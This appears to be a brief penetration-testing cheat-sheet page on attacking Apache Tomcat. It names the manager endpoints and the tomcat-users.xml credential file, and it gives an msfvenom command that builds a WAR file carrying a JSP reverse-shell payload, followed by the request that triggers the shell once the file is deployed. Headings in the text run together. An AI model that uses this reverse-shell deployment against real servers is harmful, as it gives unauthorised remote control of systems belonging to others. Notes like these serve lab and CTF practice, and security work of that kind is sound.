Tomcat
Tomcat is like a secondary service usually runs on port 8080
Intresting Endpoints
/manager/html
/host-manager/htmlImportant Files
tomcat-users.xml # contains usernames and passwordsExploitation
Create a malicious .war file deploy it and obtain reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=1234 -f war > shell.war
Once deployed make a request to
http://targeturi:8080/shellto obtain the reverse shell
NO-GUI
Whenever there is no GUI, the malicious war file can be still uploaded and deployed which will lead to obtaining a reverse shell
Last updated
Was this helpful?